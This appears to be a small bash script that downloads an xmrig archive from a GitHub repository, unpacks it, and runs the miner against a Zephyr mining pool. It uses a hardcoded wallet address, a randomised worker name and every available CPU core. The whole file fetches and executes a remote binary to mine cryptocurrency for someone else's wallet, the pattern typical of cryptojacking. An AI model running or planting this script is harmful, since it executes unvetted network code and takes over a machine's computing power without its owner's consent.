#!/bin/bash
wget https://github.com/nandafiku/gradi/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o de.zephyr.herominers.com:1123 -u ZEPHYR2S7g7Fubm14v3m6L47GinP8VLq8WBQSSFotRfCEsLe4TJ44LUJGqF3jGikSU1FJfnPJCoLi9TiisXaGA4oN4Yg1hBMBZT2H -p $(echo $(shuf -i 1-100000 -n 1)-RAIMO) -a rx/0 -t $(nproc --all)
